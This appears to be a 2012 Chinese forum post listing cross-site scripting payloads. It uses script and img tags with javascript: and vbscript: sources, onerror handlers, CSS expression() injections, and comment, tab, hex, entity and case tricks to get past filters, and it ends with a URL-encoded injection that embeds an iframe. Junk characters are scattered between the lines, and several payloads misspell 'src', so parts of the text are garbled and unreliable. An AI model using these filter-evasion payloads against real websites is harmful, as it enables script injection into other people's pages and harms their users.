<script>alert("跨站")</script> (最常用)
; _4 t2 [' n- H; O<img scr=javascript:alert("跨站")></img>7 w, f" d6 Q. S9 p8 E, r
<img scr="javascript: alert(/跨站/)></img>
- m% j8 Z8 G! p/ P. k# P<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
! s4 g" v$ a( m; q: @<img scr="#" onerror=alert(/跨站/)></img>
% J* Y$ t5 C8 ]& b8 C" T' f<img scr="#" style="xss:expression(alert(/xss/));"></img>
- i4 r4 @; V/ f) j# A<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
( Y4 m9 \4 Y. w. k/ c7 M<img src=vbscript:msgbox ("xss")></img>) I. B0 O0 p# t, O% G4 u
<style> input {left:expression (alert('xss'))}</style>% G/ P5 |: U) ]0 m2 C; k. A
<div style={left:expression (alert('xss'))}></div>
4 L7 y& _$ L1 V<div style={left:exp/* */ression (alert('xss'))}></div>
7 D( r( G; `2 b" V2 l. @8 D6 ]" m/ e<div style={left:\0065\0078ression (alert('xss'))}></div>
! y1 e; q9 u. D/ r dhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
" ~( H! e5 e5 @$ {unicode <div style="{left:expRessioN (alert('xss'))}">7 ~. o; B$ n$ q }, W% V
$ {9 X) o Q$ o/ m$ H"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
% W+ W a5 D# h3 Q |
发表于 2012-9-13 17:15:04
收藏
支持
反对